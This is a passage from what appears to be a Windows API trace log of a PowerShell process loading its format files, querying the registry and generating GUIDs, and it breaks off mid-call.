[0026.928] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.928] GetLastError () returned 0x0 [0026.928] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.928] GetLastError () returned 0x0 [0026.930] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.930] GetLastError () returned 0x0 [0026.931] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.931] GetLastError () returned 0x0 [0026.931] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.931] GetLastError () returned 0x0 [0026.931] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.931] GetLastError () returned 0x0 [0026.931] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0xe67, lpOverlapped=0x0) returned 1 [0026.931] GetLastError () returned 0x0 [0026.931] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bc997, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bc997*, lpNumberOfBytesRead=0x1ce3e4*=0x0, lpOverlapped=0x0) returned 1 [0026.931] GetLastError () returned 0x0 [0026.931] ReadFile (in: hFile=0x2f8, lpBuffer=0x26bd390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x26bd390*, lpNumberOfBytesRead=0x1ce3e4*=0x0, lpOverlapped=0x0) returned 1 [0026.931] GetLastError () returned 0x0 [0026.931] CloseHandle (hObject=0x2f8) returned 1 [0026.931] GetLastError () returned 0x0 [0026.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0026.932] SetErrorMode (uMode=0x1) returned 0x1 [0026.932] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26ddc20 | out: lpFileInformation=0x26ddc20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0026.932] GetLastError () returned 0x0 [0026.932] SetErrorMode (uMode=0x1) returned 0x1 [0026.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0026.932] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce368 | out: phkResult=0x1ce368*=0x2f8) returned 0x0 [0026.932] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce3b0, lpData=0x0, lpcbData=0x1ce3ac*=0x0 | out: lpType=0x1ce3b0*=0x1, lpData=0x0, lpcbData=0x1ce3ac*=0x56) returned 0x0 [0026.932] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce3b0, lpData=0x2b64c0, lpcbData=0x1ce3ac*=0x56 | out: lpType=0x1ce3b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ce3ac*=0x56) returned 0x0 [0026.932] RegCloseKey (hKey=0x2f8) returned 0x0 [0026.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0026.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdea4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0026.935] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xcdb3c91f, Data2=0x1d8e, Data3=0x4c2a, Data4=([0]=0xa8, [1]=0x17, [2]=0x0, [3]=0x82, [4]=0x72, [5]=0xf3, [6]=0xca, [7]=0x3d))) returned 0x0 [0026.936] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x5014e324, Data2=0x50fd, Data3=0x47fb, Data4=([0]=0x92, [1]=0xef, [2]=0x3f, [3]=0x5f, [4]=0xc1, [5]=0x8b, [6]=0x26, [7]=0x78))) returned 0x0 [0026.936] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xe099fb, Data2=0x8256, Data3=0x4894, Data4=([0]=0x8c, [1]=0x1, [2]=0xb5, [3]=0x4, [4]=0x36, [5]=0x8f, [6]=0x73, [7]=0xce))) returned 0x0 [0026.936] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xd6c624a7, Data2=0x688c, Data3=0x42aa, Data4=([0]=0x8c, [1]=0x43, [2]=0x99, [3]=0x9f, [4]=0xd, [5]=0x48, [6]=0x25, [7]=0x75))) returned 0x0 [0026.936] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x37091d3b, Data2=0x5baf, Data3=0x4656, Data4=([0]=0xb9, [1]=0x63, [2]=0xa1, [3]=0xad, [4]=0xc7, [5]=0xf2, [6]=0x3f, [7]=0x1))) returned 0x0 [0026.936] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x9f569ea8, Data2=0x120, Data3=0x4ede, Data4=([0]=0x8c, [1]=0x84, [2]=0xf7, [3]=0x9a, [4]=0xed, [5]=0xa0, [6]=0x6, [7]=0xf8))) returned 0x0 [0026.936] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x168887a0, Data2=0xe27e, Data3=0x43cc, Data4=([0]=0xba, [1]=0x15, [2]=0x2e, [3]=0x93, [4]=0xd9, [5]=0xb8, [6]=0xa2, [7]=0x47))) returned 0x0 [0026.936] VirtualQuery (in: lpAddress=0x1cd130, lpBuffer=0x1ce130, dwLength=0x1c | out: lpBuffer=0x1ce130*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.936] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x642220e7, Data2=0x1065, Data3=0x4121, Data4=([0]=0xb5, [1]=0x3c, [2]=0xb6, [3]=0x3, [4]=0x99, [5]=0x3e, [6]=0xc4, [7]=0x98))) returned 0x0 [0026.936] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xb6e2bb18, Data2=0x6dba, Data3=0x44a2, Data4=([0]=0xb5, [1]=0xc6, [2]=0x75, [3]=0xaf, [4]=0x77, [5]=0x38, [6]=0x37, [7]=0x3e))) returned 0x0 [0026.937] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xffcc65ee, Data2=0xf409, Data3=0x4d9f, Data4=([0]=0x8c, [1]=0x29, [2]=0x77, [3]=0x68, [4]=0xc9, [5]=0x7e, [6]=0x65, [7]=0xe2))) returned 0x0 [0026.937] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xb31bff4e, Data2=0xb29, Data3=0x4cd8, Data4=([0]=0x83, [1]=0x9a, [2]=0xb6, [3]=0xec, [4]=0xcb, [5]=0xf4, [6]=0xd0, [7]=0x5f))) returned 0x0 [0026.937] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x1e98e867, Data2=0x1ca0, Data3=0x4073, Data4=([0]=0x92, [1]=0x3b, [2]=0xc2, [3]=0x4a, [4]=0x2e, [5]=0x86, [6]=0x21, [7]=0xdc))) returned 0x0 [0026.937] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xd58cf0b1, Data2=0x63bc, Data3=0x4dca, Data4=([0]=0x99, [1]=0xc9, [2]=0x17, [3]=0xd4, [4]=0xe3, [5]=0x7b, [6]=0x51, [7]=0x67))) returned 0x0 [0026.937] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x685ad65f, Data2=0xd998, Data3=0x4f23, Data4=([0]=0x85, [1]=0x81, [2]=0x50, [3]=0x7d, [4]=0x9f, [5]=0x4b, [6]=0x3d, [7]=0xfe))) returned 0x0 [0026.937] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xc44efacf, Data2=0xdce, Data3=0x407b, Data4=([0]=0xb4, [1]=0x20, [2]=0x2b, [3]=0x5, [4]=0xd7, [5]=0x57, [6]=0x11, [7]=0xcf))) returned 0x0 [0026.937] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x59c9164, Data2=0x222e, Data3=0x49d5, Data4=([0]=0xba, [1]=0x36, [2]=0xd1, [3]=0x9b, [4]=0xcb, [5]=0xf0, [6]=0xfd, [7]=0xa2))) returned 0x0 [0026.937] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x18713c7d, Data2=0x6542, Data3=0x42b0, Data4=([0]=0xbd, [1]=0xee, [2]=0x67, [3]=0xe3, [4]=0xc6, [5]=0x7d, [6]=0x28, [7]=0x19))) returned 0x0 [0026.938] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xcbfe0da0, Data2=0x5b06, Data3=0x4833, Data4=([0]=0xa5, [1]=0xa6, [2]=0xb1, [3]=0x40, [4]=0x38, [5]=0xea, [6]=0x3e, [7]=0xb6))) returned 0x0 [0026.938] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x2cc3d337, Data2=0xce0f, Data3=0x450e, Data4=([0]=0x90, [1]=0x8f, [2]=0xd6, [3]=0xd2, [4]=0x67, [5]=0x8f, [6]=0xd1, [7]=0x53))) returned 0x0 [0026.938] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.938] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.938] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.938] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x52b9a5b7, Data2=0xae45, Data3=0x44d1, Data4=([0]=0xa8, [1]=0xf, [2]=0x1d, [3]=0xa5, [4]=0x98, [5]=0xdd, [6]=0x6c, [7]=0xc8))) returned 0x0 [0026.939] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x2729a5bb, Data2=0x9a2d, Data3=0x4508, Data4=([0]=0x98, [1]=0xb4, [2]=0x98, [3]=0xdd, [4]=0x64, [5]=0xed, [6]=0x95, [7]=0x2a))) returned 0x0 [0026.939] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x34fda240, Data2=0xa85f, Data3=0x4f19, Data4=([0]=0xb0, [1]=0x75, [2]=0x65, [3]=0x7c, [4]=0xc9, [5]=0xdc, [6]=0xcb, [7]=0xab))) returned 0x0 [0026.939] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x895bf109, Data2=0xff32, Data3=0x4641, Data4=([0]=0x93, [1]=0x82, [2]=0x5a, [3]=0x8c, [4]=0x5, [5]=0x72, [6]=0x1d, [7]=0x51))) returned 0x0 [0026.939] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x1437340f, Data2=0xda0b, Data3=0x41dc, Data4=([0]=0x98, [1]=0x92, [2]=0xbc, [3]=0x5a, [4]=0x65, [5]=0x47, [6]=0xa2, [7]=0x40))) returned 0x0 [0026.939] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x567cdca, Data2=0x707c, Data3=0x4ec9, Data4=([0]=0x9e, [1]=0xb3, [2]=0xec, [3]=0x8, [4]=0x2a, [5]=0xaf, [6]=0xb5, [7]=0xd8))) returned 0x0 [0026.939] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x66182662, Data2=0x4950, Data3=0x4130, Data4=([0]=0x85, [1]=0xb6, [2]=0xc0, [3]=0xc0, [4]=0x1b, [5]=0x97, [6]=0xee, [7]=0x57))) returned 0x0 [0026.940] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xca508d7f, Data2=0x429, Data3=0x4581, Data4=([0]=0xa4, [1]=0x7e, [2]=0x6f, [3]=0x66, [4]=0x4, [5]=0x5, [6]=0xbb, [7]=0x1a))) returned 0x0 [0026.940] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x91514eef, Data2=0x6e8, Data3=0x49a8, Data4=([0]=0xba, [1]=0x17, [2]=0xfa, [3]=0x91, [4]=0x36, [5]=0xb9, [6]=0xcb, [7]=0x23))) returned 0x0 [0026.940] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x249b722f, Data2=0x55e, Data3=0x420d, Data4=([0]=0xab, [1]=0xa, [2]=0x50, [3]=0xcc, [4]=0x8c, [5]=0xea, [6]=0xce, [7]=0xd))) returned 0x0 [0026.941] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x80e1bef3, Data2=0xfef6, Data3=0x4de6, Data4=([0]=0x8c, [1]=0xda, [2]=0x9d, [3]=0x71, [4]=0x71, [5]=0xad, [6]=0x92, [7]=0x13))) returned 0x0 [0026.941] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x7039ef41, Data2=0x5262, Data3=0x4bc6, Data4=([0]=0x83, [1]=0xae, [2]=0x1b, [3]=0xe7, [4]=0x9f, [5]=0xa0, [6]=0x67, [7]=0xd3))) returned 0x0 [0026.941] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xa8bbb52d, Data2=0xb44c, Data3=0x43ae, Data4=([0]=0xaf, [1]=0x29, [2]=0x6f, [3]=0xeb, [4]=0x1e, [5]=0x15, [6]=0x46, [7]=0xa9))) returned 0x0 [0026.941] VirtualQuery (in: lpAddress=0x1cd130, lpBuffer=0x1ce130, dwLength=0x1c | out: lpBuffer=0x1ce130*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.941] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x5d32f6f7, Data2=0xa386, Data3=0x403d, Data4=([0]=0xb3, [1]=0x33, [2]=0x7a, [3]=0xce, [4]=0xf5, [5]=0x43, [6]=0xe1, [7]=0x6d))) returned 0x0 [0026.941] VirtualQuery (in: lpAddress=0x1cd130, lpBuffer=0x1ce130, dwLength=0x1c | out: lpBuffer=0x1ce130*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.943] VirtualQuery (in: lpAddress=0x1cd130, lpBuffer=0x1ce130, dwLength=0x1c | out: lpBuffer=0x1ce130*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.945] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xd6e17a1c, Data2=0x1959, Data3=0x498e, Data4=([0]=0x80, [1]=0xda, [2]=0x3d, [3]=0x60, [4]=0x87, [5]=0x7, [6]=0x70, [7]=0xfa))) returned 0x0 [0026.945] VirtualQuery (in: lpAddress=0x1cd130, lpBuffer=0x1ce130, dwLength=0x1c | out: lpBuffer=0x1ce130*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.945] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x199a0326, Data2=0x2a77, Data3=0x4dcb, Data4=([0]=0xb6, [1]=0x32, [2]=0xbe, [3]=0x5c, [4]=0x2f, [5]=0x69, [6]=0xcf, [7]=0x89))) returned 0x0 [0026.945] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x5920fddb, Data2=0xcae0, Data3=0x46bb, Data4=([0]=0x94, [1]=0x1b, [2]=0x34, [3]=0x1d, [4]=0xb3, [5]=0x80, [6]=0xbd, [7]=0x45))) returned 0x0 [0026.945] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xe639acf1, Data2=0xeb0, Data3=0x4da1, Data4=([0]=0xa9, [1]=0xe3, [2]=0xd, [3]=0xd2, [4]=0x1c, [5]=0xa7, [6]=0x8e, [7]=0x6d))) returned 0x0 [0026.945] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xa2d36b2b, Data2=0x5bc6, Data3=0x4c19, Data4=([0]=0x9a, [1]=0x24, [2]=0xdb, [3]=0xf5, [4]=0x8a, [5]=0x2c, [6]=0x89, [7]=0xab))) returned 0x0 [0026.946] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x365e3ff6, Data2=0x6434, Data3=0x4324, Data4=([0]=0xa7, [1]=0x1a, [2]=0xc4, [3]=0xef, [4]=0xe4, [5]=0xa, [6]=0x60, [7]=0x17))) returned 0x0 [0026.946] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x2b948427, Data2=0xfe19, Data3=0x4ac3, Data4=([0]=0x89, [1]=0x25, [2]=0x92, [3]=0xc7, [4]=0x95, [5]=0x22, [6]=0xc8, [7]=0x80))) returned 0x0 [0026.946] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xfbf4e7bf, Data2=0xb879, Data3=0x4a09, Data4=([0]=0xb4, [1]=0xf7, [2]=0x97, [3]=0xc1, [4]=0x7c, [5]=0x7e, [6]=0x17, [7]=0x2b))) returned 0x0 [0026.946] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.946] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x1af22436, Data2=0xd1aa, Data3=0x4687, Data4=([0]=0x8b, [1]=0xbe, [2]=0xf8, [3]=0x48, [4]=0x5f, [5]=0x3d, [6]=0x5b, [7]=0xd4))) returned 0x0 [0026.947] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x46be18c, Data2=0xe861, Data3=0x48e7, Data4=([0]=0x8d, [1]=0xad, [2]=0xd3, [3]=0x3d, [4]=0x3f, [5]=0xe6, [6]=0x67, [7]=0xb))) returned 0x0 [0026.947] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xb6c6ac1, Data2=0xd6cd, Data3=0x48c3, Data4=([0]=0xb3, [1]=0x1d, [2]=0xe2, [3]=0x25, [4]=0x52, [5]=0x73, [6]=0xdf, [7]=0xd7))) returned 0x0 [0026.947] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xfbcd97cd, Data2=0xea5a, Data3=0x4acf, Data4=([0]=0xbc, [1]=0xb8, [2]=0xb1, [3]=0xd8, [4]=0xfe, [5]=0x82, [6]=0x2b, [7]=0x9a))) returned 0x0 [0026.947] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x4a4f6df1, Data2=0x703a, Data3=0x4e50, Data4=([0]=0x9f, [1]=0x98, [2]=0xa7, [3]=0xf4, [4]=0xda, [5]=0x99, [6]=0x2f, [7]=0x47))) returned 0x0 [0026.947] VirtualQuery (in: lpAddress=0x1cd110, lpBuffer=0x1ce110, dwLength=0x1c | out: lpBuffer=0x1ce110*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.947] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0xc1c0e1d8, Data2=0x1517, Data3=0x4a99, Data4=([0]=0x8a, [1]=0xab, [2]=0x7e, [3]=0xe4, [4]=0xf6, [5]=0xf0, [6]=0xe1, [7]=0x29))) returned 0x0 [0026.947] CoCreateGuid (in: pguid=0x1ce3d8 | out: pguid=0x1ce3d8*(Data1=0x8b099c84, Data2=0xa0f4, Data3=0x4fcc, Data4=([0]=0x85, [1]=0xa6, [2]=0x15, [3]=0x33, [4]=0x1, [5]=0xca, [6]=0xc3, [7]=0x54))) returned 0x0 [0026.948] VirtualQuery (in: lpAddress=0x1cd138, lpBuffer=0x1ce138, dwLength=0x1c | out: lpBuffer=0x1ce138*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.948] VirtualQuery (in: lpAddress=0x1cd138, lpBuffer=0x1ce138, dwLength=0x1c | out: lpBuffer=0x1ce138*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.948] VirtualQuery (in: lpAddress=0x1cd138, lpBuffer=0x1ce138, dwLength=0x1c | out: lpBuffer=0x1ce138*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.948] VirtualQuery (in: lpAddress=0x1cd138, lpBuffer=0x1ce138, dwLength=0x1c | out: lpBuffer=0x1ce138*(BaseAddress=0x1cd000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0026.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cde7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0026.948] SetErrorMode (uMode=0x1) returned 0x1 [0026.948] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0026.948] GetLastError () returned 0x0 [0026.948] GetFileType (hFile=0x2f8) returned 0x1 [0026.948] SetErrorMode (uMode=0x1) returned 0x1 [0026.948] GetFileType (hFile=0x2f8) returned 0x1 [0026.949] ReadFile (in: hFile=0x2f8, lpBuffer=0x27add68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x27add68*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.950] GetLastError () returned 0x0 [0026.951] ReadFile (in: hFile=0x2f8, lpBuffer=0x27add68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x27add68*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.951] GetLastError () returned 0x0 [0026.951] ReadFile (in: hFile=0x2f8, lpBuffer=0x27add68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x27add68*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.951] GetLastError () returned 0x0 [0026.951] ReadFile (in: hFile=0x2f8, lpBuffer=0x27add68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x27add68*, lpNumberOfBytesRead=0x1ce3e4*=0x1000, lpOverlapped=0x0) returned 1 [0026.951] GetLastError () returned 0x0 [0026.952] ReadFile (in: hFile=0x2f8, lpBuffer=0x27add68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x27add68*, lpNumberOfBytesRead=0x1ce3e4*=0x8b4, lpOverlapped=0x0) returned 1 [0026.952] GetLastError () returned 0x0 [0026.952] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ad1bc, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x27ad1bc*, lpNumberOfBytesRead=0x1ce3e4*=0x0, lpOverlapped=0x0) returned 1 [0026.952] GetLastError () returned 0x0 [0026.952] ReadFile (in: hFile=0x2f8, lpBuffer=0x27add68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ce3e4, lpOverlapped=0x0 | out: lpBuffer=0x27add68*, lpNumberOfBytesRead=0x1ce3e4*=0x0, lpOverlapped=0x0) returned 1 [0026.952] GetLastError () returned 0x0 [0026.952] CloseHandle (hObject=0x2f8) returned 1 [0026.952] GetLastError () returned 0x0 [0026.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cdf44, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0026.952] SetErrorMode (uMode=0x1) returned 0x1 [0026.952] GetFileAttributesExW (in: 